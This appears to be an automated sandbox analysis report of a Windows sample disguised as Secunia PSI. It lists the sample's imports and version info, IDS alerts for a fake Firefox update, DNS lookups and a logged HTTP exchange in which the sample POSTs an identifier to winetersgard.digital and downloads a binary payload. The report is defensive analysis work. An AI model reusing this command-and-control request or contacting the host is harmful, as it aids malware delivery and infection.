                                                                          USER32.dllGetMessageW, TranslateMessage, PostThreadMessageW, DispatchMessageW, SetForegroundWindow, KillTimer, PostMessageW, RegisterWindowMessageW, PostQuitMessage, SetTimer, LoadCursorW, GetParent, DialogBoxParamW, GetWindowRect, DestroyWindow, MoveWindow, UnregisterClassW, EndPaint, ClientToScreen, GetWindowTextLengthW, DestroyAcceleratorTable, BringWindowToTop, CharNextW, IsChild, SetCapture, GetKeyState, InvalidateRgn, CreateAcceleratorTableW, BeginPaint, InvalidateRect, ReleaseDC, GetDlgItem, RedrawWindow, GetSysColor, GetWindow, SendMessageW, GetWindowInfo, EnumWindows, GetWindowTextW, GetClassNameW, GetWindowThreadProcessId, FillRect, DrawIconEx, GetDC, LoadIconW, DestroyIcon, GetFocus, IsWindowEnabled, SetFocus, IsWindow, MessageBoxW, EnableWindow, ShowWindow, GetMonitorInfoW, UpdateWindow, MapWindowPoints, GetActiveWindow, CreateWindowExW, SetWindowPos, GetDesktopWindow, SendDlgItemMessageW, EndDialog, SetWindowLongW, MonitorFromWindow, GetWindowLongW, RegisterClassExW, ScreenToClient, GetClassInfoExW, ReleaseCapture, SetWindowTextW, CallWindowProcW, DefWindowProcW, GetClientRect
                                                                          OLEAUT32.dllVariantInit, VariantClear, SysFreeString, VariantCopy, SysAllocString, SafeArrayLock, SafeArrayCopy, LoadRegTypeLib, OleCreateFontIndirect, SafeArrayGetVartype, DispCallFunc, SafeArrayCreate, SafeArrayUnlock, LoadTypeLib, SysStringByteLen, SysAllocStringByteLen, VariantChangeType, VarI4FromStr, SysStringLen, SafeArrayGetUBound, SafeArrayGetElement, SafeArrayDestroy, SafeArrayGetLBound, SysAllocStringLen
                                                                          WININET.dllInternetCloseHandle, InternetErrorDlg, HttpOpenRequestW, HttpQueryInfoW, HttpSendRequestW, InternetConnectW, InternetReadFile, InternetQueryOptionW, InternetOpenW, InternetSetOptionW
                                                                          WINHTTP.dllWinHttpGetProxyForUrl, WinHttpCloseHandle
                                                                          VERSION.dllVerQueryValueW, GetFileVersionInfoW
                                                                          NETAPI32.dllNetGetJoinInformation, NetApiBufferFree, NetWkstaGetInfo
                                                                          PSAPI.DLLEnumProcesses, GetModuleFileNameExW, EnumProcessModules, GetModuleBaseNameW
                                                                          Secur32.dllGetUserNameExW, GetComputerObjectNameW
                                                                          SHLWAPI.dllStrStrW, StrStrIW
                                                                          IPHLPAPI.DLLGetAdaptersInfo
                                                                          GDI32.dllRemoveFontResourceExW, AddFontResourceExW, BitBlt, GetDeviceCaps, DeleteDC, GetDIBits, DeleteObject, SelectObject, CreateCompatibleDC, CreateCompatibleBitmap, RealizePalette, SelectPalette, GetObjectW, CreateSolidBrush, GetStockObject
                                                                          SHELL32.dllSHGetMalloc, SHGetFileInfoW, SHBrowseForFolderW, ShellExecuteExW, SHGetPathFromIDListW, SHGetFolderPathW
                                                                          ole32.dllStringFromCLSID, CoTaskMemAlloc, CoGetClassObject, CoTaskMemFree, OleUninitialize, OleInitialize, StringFromGUID2, CreateStreamOnHGlobal, CLSIDFromString, OleLockRunning, CoInitializeSecurity, CoCreateInstance, CoInitializeEx, CoCreateInstanceEx, CLSIDFromProgID, CoUninitialize, CoAddRefServerProcess, CoReleaseServerProcess, CoCreateGuid
                                                                          COMDLG32.dllCommDlgExtendedError, GetSaveFileNameW
                                                                          ADVAPI32.dllCloseServiceHandle, GetSidLengthRequired, IsValidSid, GetSecurityDescriptorOwner, InitializeAcl, MakeAbsoluteSD, GetSecurityDescriptorLength, SetSecurityDescriptorDacl, InitializeSecurityDescriptor, AddAce, GetSecurityDescriptorSacl, MakeSelfRelativeSD, GetLengthSid, GetSecurityDescriptorGroup, GetSecurityDescriptorDacl, CryptAcquireContextW, RegCloseKey, RegConnectRegistryW, GetSidSubAuthority, GetAclInformation, CopySid, GetSecurityDescriptorControl, CryptReleaseContext, CryptGetHashParam, CryptCreateHash, CryptDestroyHash, CryptHashData, RegOpenKeyExA, RegQueryValueExA, GetNamedSecurityInfoW, LookupAccountSidW, GetAce, EqualSid, QueryServiceConfigW, ControlService, ChangeServiceConfigW, QueryServiceStatus, StartServiceW, OpenServiceW, OpenSCManagerW, DeleteService, InitializeSid, ConvertSidToStringSidW, CheckTokenMembership, FreeSid, SetSecurityDescriptorOwner, AllocateAndInitializeSid, GetSecurityInfo, SetNamedSecurityInfoW, GetTokenInformation, SetSecurityDescriptorGroup, GetUserNameW, OpenProcessToken, RegSetValueExW, RegEnumKeyExW, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegQueryInfoKeyW, RegQueryValueExW, RegCreateKeyExW
                                                                          CRYPT32.dllCryptUnprotectData, CryptProtectData
                                                                          DescriptionData
                                                                          CompanyNameSecunia
                                                                          FileDescriptionSecunia PSI
                                                                          FileVersion3.0.0.11005
                                                                          InternalNamePSI.exe
                                                                          LegalCopyright(c) 2007-2015 Secunia. All rights reserved.
                                                                          OriginalFilenamePSI.exe
                                                                          ProductNameSecunia PSI
                                                                          ProductVersion3.0.0.11005
                                                                          Translation0x0409 0x04e4
                                                                          Language of compilation systemCountry where language is spokenMap
                                                                          EnglishUnited States
                                                                          ArabicSaudi Arabia
                                                                          DanishDenmark
                                                                          GermanGermany
                                                                          SpanishSpain
                                                                          FrenchFrance
                                                                          DutchNetherlands
                                                                          NorwegianNorway
                                                                          EnglishGreat Britain
                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                          2025-04-13T17:06:28.154230+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649691104.21.13.126443TCP
                                                                          2025-04-13T17:06:31.131004+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649693104.21.13.126443TCP
                                                                          2025-04-13T17:06:33.577954+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649694104.21.13.126443TCP
                                                                          2025-04-13T17:06:34.790472+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649695104.21.13.126443TCP
                                                                          2025-04-13T17:06:38.799505+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649696104.21.13.126443TCP
                                                                          2025-04-13T17:06:40.410690+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649697104.21.13.126443TCP
                                                                          2025-04-13T17:06:42.814821+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649698104.21.13.126443TCP
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Apr 13, 2025 17:06:27.897552967 CEST49691443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:27.897663116 CEST44349691104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:27.897770882 CEST49691443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:27.904922009 CEST49691443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:27.904958010 CEST44349691104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:28.154118061 CEST44349691104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:28.154230118 CEST49691443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:28.156440973 CEST49691443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:28.156470060 CEST44349691104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:28.156900883 CEST44349691104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:28.211086035 CEST49691443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:28.602648973 CEST49691443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:28.602710962 CEST49691443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:28.603115082 CEST44349691104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:29.188993931 CEST44349691104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:29.189122915 CEST44349691104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:29.189192057 CEST49691443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:29.189254045 CEST44349691104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:29.189361095 CEST44349691104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:29.189440012 CEST49691443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:29.189455032 CEST44349691104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:29.189580917 CEST44349691104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:29.189634085 CEST49691443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:29.189646006 CEST44349691104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:29.189737082 CEST44349691104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:29.189795971 CEST49691443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:29.189809084 CEST44349691104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:29.190924883 CEST44349691104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:29.190993071 CEST49691443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:29.191004992 CEST44349691104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:29.191082954 CEST44349691104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:29.191133022 CEST49691443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:29.191145897 CEST44349691104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:29.242331982 CEST49691443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:29.336337090 CEST44349691104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:29.336536884 CEST44349691104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:29.336649895 CEST44349691104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:29.336709976 CEST49691443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:29.336741924 CEST44349691104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:29.336795092 CEST49691443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:29.336810112 CEST44349691104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:29.336908102 CEST44349691104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:29.336963892 CEST49691443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:29.336976051 CEST44349691104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:29.337085962 CEST44349691104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:29.337142944 CEST49691443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:29.337155104 CEST44349691104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:29.337368011 CEST44349691104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:29.337440968 CEST44349691104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:29.337447882 CEST49691443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:29.337469101 CEST44349691104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:29.337563038 CEST49691443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:29.337621927 CEST44349691104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:29.337783098 CEST44349691104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:29.337852955 CEST49691443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:29.337866068 CEST44349691104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:29.338021994 CEST44349691104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:29.338074923 CEST49691443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:29.338085890 CEST44349691104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:29.338190079 CEST44349691104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:29.338365078 CEST49691443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:29.342622995 CEST49691443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:29.342662096 CEST44349691104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:29.342694044 CEST49691443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:29.342709064 CEST44349691104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:30.891140938 CEST49693443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:30.891244888 CEST44349693104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:30.891355038 CEST49693443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:30.891844988 CEST49693443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:30.891884089 CEST44349693104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:31.130920887 CEST44349693104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:31.131004095 CEST49693443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:31.132327080 CEST49693443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:31.132345915 CEST44349693104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:31.132678986 CEST44349693104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:31.134263992 CEST49693443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:31.134474039 CEST49693443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:31.134516954 CEST44349693104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:31.134612083 CEST49693443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:31.134624958 CEST44349693104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:32.945535898 CEST44349693104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:32.953763008 CEST49693443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:33.347204924 CEST49694443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:33.347250938 CEST44349694104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:33.347315073 CEST49694443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:33.347767115 CEST49694443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:33.347784042 CEST44349694104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:33.577676058 CEST44349694104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:33.577954054 CEST49694443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:33.579056025 CEST49694443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:33.579062939 CEST44349694104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:33.579461098 CEST44349694104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:33.580599070 CEST49694443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:33.580599070 CEST49694443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:33.580641985 CEST44349694104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:33.584319115 CEST49694443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:33.628264904 CEST44349694104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:34.282535076 CEST44349694104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:34.282769918 CEST49694443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:34.542776108 CEST49695443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:34.542876959 CEST44349695104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:34.542998075 CEST49695443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:34.543494940 CEST49695443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:34.543534040 CEST44349695104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:34.790249109 CEST44349695104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:34.790472031 CEST49695443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:34.792126894 CEST49695443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:34.792155027 CEST44349695104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:34.792614937 CEST44349695104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:34.794213057 CEST49695443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:34.794388056 CEST49695443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:34.794437885 CEST44349695104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:34.794539928 CEST49695443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:34.794554949 CEST44349695104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:35.533736944 CEST44349695104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:35.534296989 CEST49695443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:38.569349051 CEST49696443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:38.569406033 CEST44349696104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:38.569488049 CEST49696443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:38.569819927 CEST49696443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:38.569833040 CEST44349696104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:38.799266100 CEST44349696104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:38.799504995 CEST49696443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:38.827131987 CEST49696443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:38.827184916 CEST44349696104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:38.828187943 CEST44349696104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:38.829523087 CEST49696443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:38.829603910 CEST49696443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:38.829724073 CEST44349696104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:39.413119078 CEST44349696104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:39.413364887 CEST44349696104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:39.413485050 CEST49696443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:39.431927919 CEST49696443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:39.431941986 CEST44349696104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:40.169612885 CEST49697443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:40.169706106 CEST44349697104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:40.170100927 CEST49697443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:40.170598984 CEST49697443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:40.170636892 CEST44349697104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:40.410406113 CEST44349697104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:40.410690069 CEST49697443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:40.412682056 CEST49697443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:40.412714005 CEST44349697104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:40.413049936 CEST44349697104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:40.431665897 CEST49697443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:40.432686090 CEST49697443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:40.432753086 CEST44349697104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:40.432893991 CEST49697443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:40.432956934 CEST44349697104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:40.433130980 CEST49697443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:40.433315992 CEST44349697104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:40.433505058 CEST49697443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:40.433538914 CEST44349697104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:40.433763027 CEST49697443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:40.433820963 CEST44349697104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:40.434062958 CEST49697443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:40.434101105 CEST44349697104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:40.434120893 CEST49697443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:40.434164047 CEST44349697104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:40.434324026 CEST49697443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:40.434401989 CEST49697443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:40.476346016 CEST44349697104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:40.476571083 CEST49697443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:40.476656914 CEST49697443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:40.476696968 CEST49697443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:40.524267912 CEST44349697104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:40.524499893 CEST49697443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:40.524595976 CEST49697443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:40.524646044 CEST49697443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:40.568293095 CEST44349697104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:40.568404913 CEST49697443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:40.612296104 CEST44349697104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:40.773197889 CEST44349697104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:42.080986977 CEST44349697104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:42.081290007 CEST44349697104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:42.081463099 CEST49697443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:42.115381002 CEST49697443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:42.115427017 CEST44349697104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:42.536765099 CEST49698443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:42.536868095 CEST44349698104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:42.536958933 CEST49698443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:42.573604107 CEST49698443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:42.573683977 CEST44349698104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:42.814719915 CEST44349698104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:42.814821005 CEST49698443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:42.839704037 CEST49698443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:42.839747906 CEST44349698104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:42.840643883 CEST44349698104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:42.845038891 CEST49698443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:42.845038891 CEST49698443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:42.845244884 CEST44349698104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:43.315432072 CEST44349698104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:43.315610886 CEST44349698104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:43.315710068 CEST49698443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:43.315876007 CEST49698443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:43.315924883 CEST44349698104.21.13.126192.168.2.6
                                                                          Apr 13, 2025 17:06:43.315959930 CEST49698443192.168.2.6104.21.13.126
                                                                          Apr 13, 2025 17:06:43.315978050 CEST44349698104.21.13.126192.168.2.6
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Apr 13, 2025 17:06:27.717521906 CEST5157853192.168.2.61.1.1.1
                                                                          Apr 13, 2025 17:06:27.859970093 CEST53515781.1.1.1192.168.2.6
                                                                          Apr 13, 2025 17:06:40.477786064 CEST5849453192.168.2.61.1.1.1
                                                                          Apr 13, 2025 17:06:40.675299883 CEST53584941.1.1.1192.168.2.6
                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Apr 13, 2025 17:06:27.717521906 CEST192.168.2.61.1.1.10xc661Standard query (0)winetersgard.digitalA (IP address)IN (0x0001)false
                                                                          Apr 13, 2025 17:06:40.477786064 CEST192.168.2.61.1.1.10x797bStandard query (0)winetersgard.digitalA (IP address)IN (0x0001)false
                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Apr 13, 2025 17:06:27.859970093 CEST1.1.1.1192.168.2.60xc661No error (0)winetersgard.digital104.21.13.126A (IP address)IN (0x0001)false
                                                                          Apr 13, 2025 17:06:27.859970093 CEST1.1.1.1192.168.2.60xc661No error (0)winetersgard.digital172.67.132.210A (IP address)IN (0x0001)false
                                                                          Apr 13, 2025 17:06:40.675299883 CEST1.1.1.1192.168.2.60x797bNo error (0)winetersgard.digital104.21.13.126A (IP address)IN (0x0001)false
                                                                          Apr 13, 2025 17:06:40.675299883 CEST1.1.1.1192.168.2.60x797bNo error (0)winetersgard.digital172.67.132.210A (IP address)IN (0x0001)false
                                                                          • winetersgard.digital
                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.649691104.21.13.1264437344C:\Users\user\Desktop\1st.Setup_patched.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-04-13 15:06:28 UTC269OUTPOST /agbb HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                          Content-Length: 53
                                                                          Host: winetersgard.digital
                                                                          2025-04-13 15:06:28 UTC53OUTData Raw: 75 69 64 3d 30 63 36 62 34 38 39 61 36 62 31 33 61 36 32 32 31 32 64 36 36 63 63 37 34 39 38 38 65 65 37 30 30 31 37 66 65 65 32 32 38 62 66 36 26 63 69 64 3d
                                                                          Data Ascii: uid=0c6b489a6b13a62212d66cc74988ee70017fee228bf6&cid=
                                                                          2025-04-13 15:06:29 UTC805INHTTP/1.1 200 OK
                                                                          Date: Sun, 13 Apr 2025 15:06:29 GMT
                                                                          Content-Type: application/octet-stream
                                                                          Content-Length: 33755
                                                                          Connection: close
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yaEUbP%2FEFaW4Nv7qwVn6gJumlXmKWFgjdZTMmxaJ%2B0KljWHMSxa0rKdZ8voA0qG%2FJ4xfy5Zsk9SdUbgwCoEpSe2k6rs6UfC1r65kESo9rKr%2BwWsexcQbwvgyyC%2BU%2FyqX%2B0UHgyrmSQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 92fbde19294e0c0a-JAX
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=113439&min_rtt=112819&rtt_var=24446&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2852&recv_bytes=958&delivery_rate=35788&cwnd=252&unsent_bytes=0&cid=e3b6b1f1d375933a&ts=1055&x=0"
                                                                          2025-04-13 15:06:29 UTC564INData Raw: 9a b3 b6 08 a9 a3 64 cb 52 12 f0 e0 07 cb 40 69 00 cd 5a c6 fb 26 24 45 74 df 52 b8 13 8e 20 d9 f2 cf 03 fd 79 ec d7 5e a0 64 bf 70 cc 84 7e e9 ef c0 73 cf 67 6a 82 3c c0 14 1b 42 f9 da e6 51 57 8a 42 c4 12 2f f0 89 27 16 a1 5d bd 19 02 09 d7 59 6b 43 fc 29 1c 40 ff 87 54 cc cb 63 0f a9 61 bd 61 1a 7e a9 31 9b ce 5b 40 23 6a 7b 8b 37 3a 6b 03 b3 06 16 c4 85 06 74 89 80 73 03 62 c0 30 81 1f 82 15 85 20 a5 81 96 b9 29 02 c2 9e 54 69 8f 11 c9 16 b3 3e 96 76 01 29 af 0e 00 39 d1 61 6a 92 47 be 4d 95 47 63 fb 0b 5b 1e 87 b5 4c 99 58 98 fc b8 17 84 ff d1 d3 86 3e a5 92 ae bb 14 38 3f 7e 5b 4c 23 ad 5e fc da d9 4b 16 8c 44 ff bb 68 35 3f 1c 59 dd a0 f9 5b cd ee 2a 45 3d a8 39 9f 2d 99 c3 ac e3 3b 0f 32 f6 37 56 f7 4a cd 58 7d 9c c9 93 8e 64 e3 78 21 d9 02 9a 65
